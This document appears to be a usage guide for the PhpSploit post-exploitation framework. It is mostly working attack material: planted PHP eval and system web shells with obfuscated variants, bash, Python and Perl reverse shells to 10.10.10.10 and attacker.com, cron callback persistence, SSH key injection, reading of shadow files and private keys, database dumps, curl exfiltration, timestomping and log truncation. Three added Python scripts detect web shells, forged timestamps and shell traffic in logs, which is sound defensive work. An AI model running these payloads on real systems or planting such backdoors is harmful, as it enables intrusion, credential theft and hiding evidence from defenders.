PhpSploit
Overview
PhpSploit is a remote administration framework for stealthy post-exploitation on compromised PHP web servers. It drives a one-line PHP stub (the "backdoor") that the operator has planted on the target: every console command is turned into PHP code, sent in an HTTP request, executed by the stub and returned in the response. Command execution, file management and system enumeration all go through that single channel.
Key Features:
- Stealth PHP backdoor: upstream's stub is a single eval() line that reads its payload from an HTTP request header, so the URL and query string stay clean
- Interactive remote shell environment
- File upload, download and manipulation
- System enumeration and reconnaissance
- Memory-based operation: only the stub touches the target's disk, payloads live in requests
- Anti-detection settings (configurable user agent, extra request headers, proxy)
- Session save and restore
Installation
From GitHub
git clone https://github.com/nil0x42/phpsploit.git
cd phpsploit
chmod +x phpsploit
Requirements
- Python 3.6+
- A target web server that executes PHP (the stub is plain PHP; nothing else is needed on the remote side)
- Network reachability to the target, directly or through the proxy configured in PhpSploit
Verify Installation
./phpsploit --version
./phpsploit --help
# Docker alternative (assumes an image tagged "phpsploit" has already been built locally from the repository)
docker run -it --rm phpsploit
Basic Setup
Start PhpSploit Console
./phpsploit
Connect to Existing Backdoor
The target is a setting; the session is opened with exploit:
phpsploit> set TARGET http://target.com/shell.php
phpsploit> exploit
Deploy New Backdoor
PhpSploit only talks to its own stub, and the stub must already be on the server before the first exploit (through the initial foothold: a file-upload flaw, an existing shell, stolen FTP credentials). backdoor prints the stub matching the current PASSKEY setting, of the form <?php @eval($_SERVER['HTTP_<PASSKEY>']); ?>:
phpsploit> backdoor
Once a session is open, further files (including another copy of the stub) are placed with upload:
phpsploit> upload shell.php /var/www/html/upload/
Interactive Shell
phpsploit> shell
Core Commands
| Command | Description |
|---|---|
| set | Show or change settings (set alone lists them; TARGET, PASSKEY, PROXY and HTTP_USER_AGENT are the ones used most) |
| exploit | Open a session with the backdoor at TARGET |
| backdoor | Print the PHP stub to plant on the target for the current PASSKEY |
| run | Execute one system command through the backdoor |
| shell | Interactive command shell (each line is still one HTTP request) |
| upload | Upload a local file to the target |
| download | Download a file from the target |
| session | Save or reload a session (settings and state) |
| help | Display command help |
| exit | Exit framework |
Connection Management
Connect to Backdoor
phpsploit> set TARGET http://target.com/index.php
phpsploit> exploit
phpsploit> set TARGET http://target.com:8080/shell.php
phpsploit> exploit
phpsploit> set TARGET http://target.com/admin/upload/shell.php
phpsploit> exploit
Connection with Proxy
phpsploit> set PROXY http://127.0.0.1:8080
phpsploit> exploit
Authentication
The backdoor has no login of its own. The shared secret is PASSKEY, which names the request header the stub evaluates; it must match the stub you planted, otherwise exploit fails even though the page is served:
phpsploit> set PASSKEY PhpSpl01t
phpsploit> exploit
If the stub sits behind HTTP Basic authentication (user admin, password secret123), send the Authorization header with every request. PhpSploit sends each HTTP_* setting as a request header; confirm the list with help set in your version:
phpsploit> set HTTP_AUTHORIZATION "Basic YWRtaW46c2VjcmV0MTIz"
phpsploit> exploit
Session Management
phpsploit> session
phpsploit> session save ./target.session
phpsploit> session load ./target.session
Remote Command Execution
Every run is one HTTP request: the command string is handed to the target's /bin/sh, PHP waits for it to finish, and its output comes back in the response. Bash-only syntax therefore needs an explicit bash -c, and anything long-running must be detached or the request hangs until it times out.
Execute Single Command
phpsploit> run id
phpsploit> run whoami
phpsploit> run pwd
phpsploit> run uname -a
Interactive Shell Mode
phpsploit> shell
[shell]> id
[shell]> whoami
[shell]> ls -la
[shell]> exit
Execute Shell Scripts
# single quotes: $i must reach bash unexpanded, and {1..10} is a bash feature /bin/sh lacks
phpsploit> run bash -c 'for i in {1..10}; do echo $i; done'
phpsploit> run sh -c 'cat /etc/passwd'
phpsploit> run perl -e 'print "Hello\n"'
Background Command Execution
# detach and close stdout/stderr, otherwise PHP keeps waiting for the output pipe to close
phpsploit> run nohup bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1' >/dev/null 2>&1 &
File Operations
Upload Files
phpsploit> upload /path/to/local/file.txt /var/www/html/
phpsploit> upload shell.php /var/www/html/uploads/
phpsploit> upload /path/to/payload.elf /tmp/
Download Files
phpsploit> download /etc/passwd ./password_dump.txt
phpsploit> download /var/www/html/config.php ./config_backup.php
# works only if the web server user can read it, which a sane system does not allow
phpsploit> download /etc/shadow ./shadow_dump
List Remote Directory
phpsploit> run ls -la /var/www/html/
phpsploit> run find /var/www/html -type f -name "*.php"
phpsploit> run du -sh /var/www/html/*
Create/Modify Files
# \$ keeps $_GET from being expanded by the remote /bin/sh before it reaches the file
phpsploit> run echo "<?php system(\$_GET['c']); ?>" > /var/www/html/shell.php
# a heredoc cannot be typed across console lines (each line is a separate request); build the file in one command or upload it
phpsploit> run printf '%s\n' '#!/bin/sh' 'id' 'uname -a' > /tmp/script.sh
phpsploit> upload ./script.sh /tmp/script.sh
System Enumeration
Get System Information
phpsploit> run uname -a
phpsploit> run cat /etc/os-release
phpsploit> run hostnamectl
phpsploit> run whoami
phpsploit> run id
Network Information
phpsploit> run ip addr show
phpsploit> run ifconfig
phpsploit> run netstat -tulpn
phpsploit> run ss -tulpn
Process Enumeration
phpsploit> run ps aux
phpsploit> run ps aux | grep -i apache
phpsploit> run ps aux | grep -i nginx
User and Privilege Information
phpsploit> run cat /etc/passwd
# -n: never prompt; there is no terminal behind the backdoor, so a password prompt would just hang the request
phpsploit> run sudo -n -l
# root-only (mode 0440) unless misconfigured; a permission error here is the expected result
phpsploit> run cat /etc/sudoers
Disk and Storage Information
phpsploit> run df -h
phpsploit> run mount
phpsploit> run lsblk
Backdoor Deployment
PHP Backdoor Creation
These are generic one-line web shells driven with curl or a browser; PhpSploit itself speaks only to the eval stub printed by its backdoor command.
# Simple one-liner backdoor (command and response size both end up in the access log's query string)
<?php system($_GET['cmd']); ?>
# POST variant: the command no longer appears in the access log, only the request does
<?php if(isset($_POST['c'])){ echo "<pre>";system($_POST['c']);echo "</pre>"; } ?>
# Base64 encoded command execution (hides the command from casual log review, not from anyone who decodes it)
<?php system(base64_decode($_GET['x'])); ?>
Deploy Backdoor via PhpSploit
# backdoor.php holds the stub printed by the backdoor command for the current PASSKEY
phpsploit> upload backdoor.php /var/www/html/
phpsploit> set TARGET http://target.com/backdoor.php
phpsploit> exploit
Obfuscated Backdoor
# Variable obfuscation: the function name is assembled at runtime, so a grep for "system(" misses it
<?php $a="sy"."st"."em"; $a($_GET['c']); ?>
# Function indirection via create_function (deprecated in PHP 7.2 and removed in PHP 8.0, so this fails on current targets)
<?php $f=create_function('$x','return system($x);'); echo $f($_GET['c']); ?>
Persistent Backdoor
# Second copy in a dotted directory (create it first; plain ls does not show it, ls -a and find do)
phpsploit> run mkdir -p /var/www/html/.hidden
phpsploit> run echo '<?php system($_GET["c"]); ?>' > /var/www/html/.hidden/shell.php
phpsploit> run chmod 644 /var/www/html/.hidden/shell.php
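What the obfuscation above looks like from the other side. The script below is an added example written for this page (not PhpSploit code): a static triage pass that flags the constructs shown in this section, including the eval-of-a-request-header form that upstream's own stub uses, and scores them so that an innocent $_SERVER['HTTP_HOST'] read does not trip the alarm on its own. The rule weights, the threshold and the sample files are all constructed for the demonstration.

```python
"""Static triage of PHP source for webshell constructs.

Added example for this page, not part of PhpSploit. Rules, weights and the
sample files below are constructed for the demonstration.
"""
import re

REQUEST_VARS = r"\$_(GET|POST|REQUEST|COOKIE|SERVER)\b"
EXEC_FUNCS = r"\b(system|exec|shell_exec|passthru|popen|proc_open)"
DECODERS = r"(base64_decode|str_rot13|gzinflate|gzuncompress|strrev|hex2bin)"

# (rule name, pattern, weight). Weights are a heuristic chosen for this example.
RULES = [
    ("exec-on-request-input",                       # system($_GET['cmd'])
     re.compile(EXEC_FUNCS + r"\s*\(\s*" + REQUEST_VARS), 5),
    ("eval-on-request-input",                       # eval($_POST['x'])
     re.compile(r"\beval\s*\(\s*" + REQUEST_VARS), 5),
    ("exec-on-decoded-input",                       # system(base64_decode(...))
     re.compile(r"\b(system|exec|shell_exec|passthru|eval)\s*\(\s*" + DECODERS + r"\s*\("), 5),
    ("eval-of-http-header",                         # $_SERVER['HTTP_<PASSKEY>'], PhpSploit style
     re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_[A-Z0-9_]+['\"]\s*\]"), 3),
    ("decoder-call", re.compile(r"\b" + DECODERS + r"\s*\("), 2),
    ("create_function", re.compile(r"\bcreate_function\s*\("), 4),
    ("concatenated-function-name",                  # $a="sy"."st"."em";
     re.compile(r"\$\w+\s*=\s*(['\"][a-z_]{1,4}['\"]\s*\.\s*)+['\"][a-z_]{1,4}['\"]\s*;"), 3),
    ("variable-function-on-request-input",          # $a($_GET['c'])
     re.compile(r"\$\w+\s*\(\s*" + REQUEST_VARS), 4),
    ("error-suppressed-eval", re.compile(r"@\s*eval\s*\("), 2),
]

# Constructed sample files: the shells from this page plus two benign files.
SAMPLES = {
    "simple.php": "<?php system($_GET['cmd']); ?>",
    "post.php": '<?php if(isset($_POST[\'c\'])){ echo "<pre>";system($_POST[\'c\']);echo "</pre>"; } ?>',
    "b64.php": "<?php system(base64_decode($_GET['x'])); ?>",
    "concat.php": '<?php $a="sy"."st"."em"; $a($_GET[\'c\']); ?>',
    "cf.php": "<?php $f=create_function('$x','return system($x);'); echo $f($_GET['c']); ?>",
    "phpsploit_stub.php": "<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>",
    "legit_config.php": "<?php\n$db = ['host' => 'localhost', 'name' => 'app'];\nreturn $db;\n",
    "legit_upload.php": "<?php\n$name = basename($_FILES['f']['name']);\n"
                        "move_uploaded_file($_FILES['f']['tmp_name'], '/var/www/uploads/' . $name);\n",
}


def scan_source(src):
    """Return {'score': int, 'hits': [rule names]} for one PHP source string."""
    hits = [name for name, rx, _ in RULES if rx.search(src)]
    score = sum(w for name, _, w in RULES if name in hits)
    return {"score": score, "hits": hits}


def classify(src, threshold=4):
    """'suspicious' when the summed weights reach the threshold, else 'clean'."""
    return "suspicious" if scan_source(src)["score"] >= threshold else "clean"


def scan_files(files, threshold=4):
    """files: {path: source}. Returns {path: (score, verdict, hits)}, highest score first."""
    out = {}
    for path, src in files.items():
        r = scan_source(src)
        out[path] = (r["score"], "suspicious" if r["score"] >= threshold else "clean", r["hits"])
    return dict(sorted(out.items(), key=lambda kv: -kv[1][0]))


if __name__ == "__main__":
    for path, (score, verdict, hits) in scan_files(SAMPLES).items():
        print(f"{verdict:10} {score:2}  {path:22} {', '.join(hits)}")
```

The header rule is deliberately weighted below the threshold: reading $_SERVER['HTTP_HOST'] is normal PHP, and it only becomes a finding together with an eval on the same input, which is precisely the combination the PhpSploit stub has. In a real sweep the scanner runs over the web root and the rules are only the first filter; every hit is read by a human.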
Post-Exploitation Workflows
Privilege Escalation Enumeration
phpsploit> run sudo -n -l
phpsploit> run find / -perm -4000 -type f 2>/dev/null
phpsploit> run find / -writable -not -path "/proc/*" 2>/dev/null | head -20
phpsploit> run cat /etc/crontab
Credential Harvesting
# these only succeed if the web server runs as root or the files are world-readable; a permission error is itself a finding
phpsploit> run cat /etc/shadow
phpsploit> run cat /home/*/.bash_history
phpsploit> run cat /root/.ssh/id_rsa
Lateral Movement
# Enumerate internal network (nmap is rarely installed on a web server; arp -a or ip neigh costs nothing and sends no packets)
phpsploit> run nmap -sn 192.168.1.0/24
phpsploit> run arp -a
# Services listening on this host (a local view, not a scan of the neighbours)
phpsploit> run netstat -tulpn | grep LISTEN
Data Exfiltration
# Tar and compress sensitive files
phpsploit> run tar -czf /tmp/data.tar.gz /var/www/html/
# Encode only as a fallback if the transfer of the raw archive fails; text is about a third larger than the archive
phpsploit> run base64 /tmp/data.tar.gz > /tmp/data.b64
# Download exfiltrated data
phpsploit> download /tmp/data.b64 ./exfiltrated_data.b64
Advanced Configuration
Settings are listed with set (no arguments) and changed with set NAME VALUE; names are uppercase. Read help set for the complete list and value formats in your version.
Set User Agent
phpsploit> set HTTP_USER_AGENT "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
phpsploit> set HTTP_USER_AGENT "Custom-Agent/1.0"
Proxy Configuration
phpsploit> set PROXY http://127.0.0.1:8080
phpsploit> set PROXY socks5://127.0.0.1:9050
Timeout Settings
# the names below are placeholders; the timeout and request-pacing settings differ between releases, so take the real names from set
phpsploit> set timeout 30
phpsploit> set connect_timeout 10
Request Headers
# every HTTP_* setting is sent as a request header (HTTP_AUTHORIZATION becomes Authorization:, underscores become dashes)
phpsploit> set HTTP_AUTHORIZATION "Bearer token123"
phpsploit> set HTTP_X_CUSTOM_HEADER "value"
Verbosity and Logging
phpsploit> set VERBOSITY True
# keep settings and state between runs by saving the session
phpsploit> session save ./phpsploit.session
Exploitation Techniques
Reverse Shell Deployment
Start a listener first (for example nc -lvnp 4444 on 10.10.10.10). Each one-liner is detached with nohup ... & because the backdoor request only returns when the command's stdout closes.
# Bash reverse shell (bash -c is required: the backdoor hands commands to /bin/sh, which knows neither >& nor /dev/tcp)
phpsploit> run nohup bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' >/dev/null 2>&1 &
# Python reverse shell
phpsploit> run nohup python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])' >/dev/null 2>&1 &
# Perl reverse shell (single quotes: inside double quotes /bin/sh would expand $i and $p to nothing before perl ever ran)
phpsploit> run nohup perl -e 'use Socket;$i="10.10.10.10";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' >/dev/null 2>&1 &
Cron Job Persistence
phpsploit> run crontab -l
# cron runs jobs with /bin/sh, so the bash-only redirection must be wrapped in bash -c here as well
phpsploit> run (crontab -l 2>/dev/null; echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'") | crontab -
SSH Key Injection
# only possible if the backdoor runs as root; sshd with StrictModes (the default) also rejects the key unless the modes are right
phpsploit> run mkdir -p /root/.ssh
phpsploit> run echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys
phpsploit> run chmod 700 /root/.ssh && chmod 600 /root/.ssh/authorized_keys
Database Access
# the password is glued to -p; a bare -p prompts for input and the request hangs
phpsploit> run mysql -u root -ppassword -e "SHOW DATABASES;"
phpsploit> run mysql -u root -ppassword wordpress -e "SELECT user_login, user_pass FROM wp_users;"
Defense Evasion
Process Hiding
# Run the command detached from the web server's process tree; it is still visible in ps, just not as a child of apache/php-fpm
phpsploit> run nohup /path/to/command >/dev/null 2>&1 &
phpsploit> run setsid /path/to/command >/dev/null 2>&1 &
Timestamp Manipulation
# touch sets atime/mtime only; ctime is stamped by the kernel on every metadata change (including this touch) and cannot be set from userland, so stat still shows when the file was touched
phpsploit> run touch -r /bin/ls /tmp/backdoor.php
phpsploit> run touch -t 202001010000 /tmp/backdoor.php
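Why touch is not enough: ctime. The following added example (written for this page, not part of PhpSploit) reproduces the touch -r trick in a scratch directory and shows that the kernel-maintained change time still reveals the edit; it also includes the sweep a responder would run over a web root. The one-hour gap threshold, the reference file and the sample files are assumptions for the demonstration.

```python
"""Detect touch-based timestamp forgery via the ctime/mtime gap.

Added example for this page, not part of PhpSploit. Files are created in a
temporary directory for the demonstration; a real sweep calls
find_timestomped() on the web root.
"""
import os
import tempfile
import time

YEAR = 365 * 86400


def copy_mtime(reference, target):
    """What `touch -r reference target` does: copies atime and mtime, nothing else."""
    st = os.stat(reference)
    os.utime(target, ns=(st.st_atime_ns, st.st_mtime_ns))


def ctime_mtime_gap(path):
    """Seconds by which the inode change time is newer than the content mtime.

    touch can set mtime to anything, but ctime is written by the kernel on every
    metadata change (that touch included), so a forged file shows a large positive gap.
    """
    st = os.stat(path)
    return st.st_ctime - st.st_mtime


def looks_timestomped(path, min_gap=3600):
    """True when ctime is more than min_gap seconds newer than mtime (assumed threshold)."""
    return ctime_mtime_gap(path) > min_gap


def find_timestomped(root, suffixes=(".php",), min_gap=3600):
    """Walk root and return the files whose ctime is newer than mtime by more than min_gap."""
    out = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(suffixes):
                p = os.path.join(dirpath, name)
                if looks_timestomped(p, min_gap):
                    out.append(p)
    return sorted(out)


def demo():
    """Recreate the page's `touch -r /bin/ls backdoor.php` in a scratch directory."""
    with tempfile.TemporaryDirectory() as d:
        ref = os.path.join(d, "reference_binary")      # stands in for /bin/ls
        backdoor = os.path.join(d, "backdoor.php")
        fresh = os.path.join(d, "fresh.php")          # an untouched file for comparison
        for p in (ref, backdoor, fresh):
            with open(p, "w") as fh:
                fh.write("<?php\n")
        old = time.time() - 3 * YEAR
        os.utime(ref, (old, old))                     # make the reference look like an old system file
        copy_mtime(ref, backdoor)                     # the evasion from the page
        return {
            "backdoor_flagged": looks_timestomped(backdoor),
            "fresh_flagged": looks_timestomped(fresh),
            "gap_seconds": ctime_mtime_gap(backdoor),
            "flagged_paths": [os.path.basename(p) for p in find_timestomped(d)],
        }


if __name__ == "__main__":
    print(demo())
```

The same gap shows up in stat output on the target (Modify versus Change), so the check needs nothing but find and stat during an incident; on filesystems with creation time (ext4 crtime, XFS, Btrfs) there is a second witness that debugfs or statx can read.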
Log Sanitization
Log files under /var/log are root-owned and not writable by the web server user, so from a www-data shell these commands normally fail; where they do work, the truncated file is itself a loud indicator, and anything already shipped to a central collector is out of reach. Editing logs is outside the rules of engagement of most penetration tests; get it in writing before trying.
# shows the entries that would be kept; it does not modify the file
phpsploit> run cat /var/log/apache2/access.log | grep -v "shell.php"
# truncate the log (needs write access to the file)
phpsploit> run > /var/log/apache2/access.log
phpsploit> run cat /dev/null > ~/.bash_history
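What a defender sees in the log you just tried to clean. The added example below (written for this page, not PhpSploit code) triages constructed Apache combined-format lines against a constructed baseline of legitimate PHP entry points: it flags the ?c= / ?cmd= parameters of the one-line shells shown on this page, POSTs to PHP files in upload or dotted directories, and repeated hits on a PHP file that is not part of the application. The parameter names, the repeat threshold and the sample data are assumptions for the demonstration.

```python
"""Triage of Apache combined-format access logs for webshell traffic.

Added example for this page, not part of PhpSploit. The log lines and the list
of legitimate PHP entry points are constructed for the demonstration.
"""
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Parameter names used by the one-line shells on this page and common copies of them (assumed list).
COMMAND_PARAMS = {"c", "cmd", "x", "exec", "command"}

# Constructed sample log. 203.0.113.7 drives a $_GET shell; 198.51.100.4 uses a
# header-carried payload (PhpSploit style), so its requests carry no query string at all.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /uploads/shell.php?c=id HTTP/1.1" 200 57 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /uploads/shell.php?c=cat+/etc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Oct/2023:13:56:02 +0000] "POST /uploads/x.php HTTP/1.1" 200 12 "-" "curl/8.4.0"
198.51.100.4 - - [10/Oct/2023:13:56:03 +0000] "GET /uploads/x.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
198.51.100.4 - - [10/Oct/2023:13:56:04 +0000] "GET /uploads/x.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
198.51.100.4 - - [10/Oct/2023:13:56:05 +0000] "GET /uploads/x.php HTTP/1.1" 200 841 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
192.0.2.9 - - [10/Oct/2023:13:57:00 +0000] "GET /about.php?page=team HTTP/1.1" 200 3301 "-" "Mozilla/5.0"
"""

# Constructed baseline: the PHP files the application legitimately serves.
KNOWN_PHP = {"/index.php", "/about.php", "/login.php"}


def parse(log_text):
    """Yield one dict per line that matches the combined format; skip anything else."""
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m:
            yield m.groupdict()


def triage(log_text, known_php, repeat_threshold=3):
    """Return a sorted list of (ip, path, reason) findings."""
    findings = set()
    hits = Counter()                      # requests per (ip, unknown PHP path)
    for rec in parse(log_text):
        url = urlsplit(rec["target"])
        path = url.path
        query = parse_qs(url.query, keep_blank_values=True)
        if not path.endswith(".php"):
            continue
        key = (rec["ip"], path)
        if COMMAND_PARAMS & set(query):
            findings.add(key + ("command-parameter",))
        if path not in known_php:
            findings.add(key + ("unknown-php-target",))
            hits[key] += 1
            if rec["method"] == "POST" and ("/uploads/" in path or "/." in path):
                findings.add(key + ("post-to-upload-dir",))
    for key, n in hits.items():
        if n >= repeat_threshold:
            findings.add(key + ("repeated-hits-unknown-php",))
    return sorted(findings)


if __name__ == "__main__":
    for ip, path, reason in triage(SAMPLE_LOG, KNOWN_PHP):
        print(f"{ip:15} {path:22} {reason}")
```

The last rule is the only one that catches PhpSploit's default transport: its payload travels in a request header, so the access log shows plain GET requests with no query string. If the access log is all there is, repeated requests from one source to one unexplained PHP file are the indicator; full request-header logging (a mod_security audit log, a reverse proxy) is what makes the header itself visible.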
Firewall Bypass
These are single callbacks that test which egress paths exist, not tunnels. Run a DNS or HTTP listener you control and watch for the hit.
# DNS: gets out even when all outbound TCP is blocked, as long as the host resolves names through some resolver
phpsploit> run nslookup attacker.com
# HTTP: carries the username to a server you own in the query string
phpsploit> run curl "http://attacker.com/callback?data=$(whoami)"
Scripting and Automation
Create PhpSploit Script
#!/bin/bash
# automated_exploitation.sh: feed console commands on stdin, one per line (./phpsploit --help lists the non-interactive options)
TARGET="http://target.com/shell.php"
phpsploit <<EOF
set TARGET $TARGET
set VERBOSITY True
exploit
run id
run whoami
run pwd
run uname -a
download /etc/passwd ./passwd.txt
exit
EOF
Batch Command Execution
# bash -c so that brace expansion and other bash-only syntax survive the trip through /bin/sh
phpsploit> run bash -c 'for i in {1..10}; do echo $i; done'
phpsploit> run find / -name "*.conf" 2>/dev/null | head -20
phpsploit> run grep -r "password" /var/www/html 2>/dev/null
Real-World Attack Scenarios
Web Server Compromise
# 1. Print the stub and plant it through the initial foothold (file-upload flaw, existing shell, stolen credentials)
phpsploit> backdoor
# 2. Connect to backdoor
phpsploit> set TARGET http://target.com/backdoor.php
phpsploit> exploit
# 3. Enumerate system
phpsploit> run uname -a
phpsploit> run id
# 4. Create persistence (single quotes keep $_GET intact; avoid names starting with .ht, Apache denies those by default)
phpsploit> run echo '<?php system($_GET["c"]); ?>' > /var/www/html/cache.php
Database Extraction
# Identify database configuration files (the file is called .env; its contents, not its name, mention the database)
phpsploit> run find / -name ".env" 2>/dev/null
# Extract credentials (Laravel-style DB_* keys or a DATABASE_URL)
phpsploit> run grep -i "DB_\|DATABASE" /var/www/html/.env
# Dump database (password glued to -p; a bare -p would wait for a prompt that never comes)
phpsploit> run mysqldump -u root -ppassword database > /tmp/dump.sql
phpsploit> download /tmp/dump.sql ./database_dump.sql
Application Server Escalation
# Identify running services
phpsploit> run ps aux | grep -i "apache\|nginx\|tomcat"
# Local listeners, with the owning process where permissions allow
phpsploit> run netstat -tulpn
# Local privilege escalation checks
phpsploit> run sudo -n -l
phpsploit> run find / -perm -4000 -type f 2>/dev/null
Troubleshooting
Connection Issues
# A plain request to the stub returns an empty 200. To prove it evaluates code, send a payload in the header named by PASSKEY (the name backdoor printed; PhpSpl01t is the default in current releases): the stub reads it as $_SERVER['HTTP_PHPSPL01T'] and the response body should be 123
curl -s -H 'PhpSpl01t: echo 123;' http://target.com/shell.php
# 403, 404 or an HTML error page here means the file is not where you think, is blocked, or is not parsed as PHP; fix that before blaming PhpSploit
# If curl works but exploit fails, the framework's view of the target is wrong: PASSKEY must match the stub, and PROXY / HTTP_* settings must be what you intend
phpsploit> set PASSKEY PhpSpl01t
phpsploit> set PROXY
phpsploit> exploit
Command Execution Problems
# Test basic commands
phpsploit> run echo test
phpsploit> run id
# Empty output from every run usually means system/exec/shell_exec are in disable_functions; phpinfo shows that and the PHP version the web server actually runs (the php CLI, if installed at all, may be a different build)
phpsploit> phpinfo
phpsploit> run php --version
File Transfer Issues
# The web server user must be able to write to the destination; ls -la shows owner and mode
phpsploit> run ls -la /var/www/html/
# Check available space
phpsploit> run df -h /var/www/html/
# Uploads are also bounded by the server's request size limits (post_max_size, upload_max_filesize in phpinfo)
Security Best Practices
Operational Security
- Route every connection through the engagement's agreed VPN or proxy so the source IP is the one the client expects to see
- Move backdoors only within the agreed scope, and keep an inventory of every file you plant so all of it can be removed at the end
- Clean logs only if the rules of engagement explicitly permit it; most do not, and the blue team needs the evidence to learn from
- Prefer HTTPS targets: the payload travels in request headers and is otherwise plaintext on the wire
- Agree on out-of-band contact points and reporting channels with the client before starting
Detection Avoidance
- Use legitimate PHP functions; the stub is a single eval() and exotic constructs are what signature scanners key on
- Avoid suspicious filenames (shell.php, cmd.php, c99.php are on every scanner's list)
- Minimize footprint on disk: payloads stay in requests, and anything written (dumps, scripts) goes in a tracked location and is removed
- Match normal traffic patterns; a burst of requests from one IP to one PHP file is the simplest webshell indicator there is
- Watch for signs you have been noticed (new WAF rules, the stub disappearing, a locked account), stop, and tell the client
Version and Support
./phpsploit --version
Legal and Ethical Considerations
Critical: PhpSploit is designed for authorized penetration testing and red team exercises only. Unauthorized access to computer systems is illegal. Always obtain explicit written authorization before deploying backdoors or conducting post-exploitation activities. Misuse of this framework may result in serious legal consequences.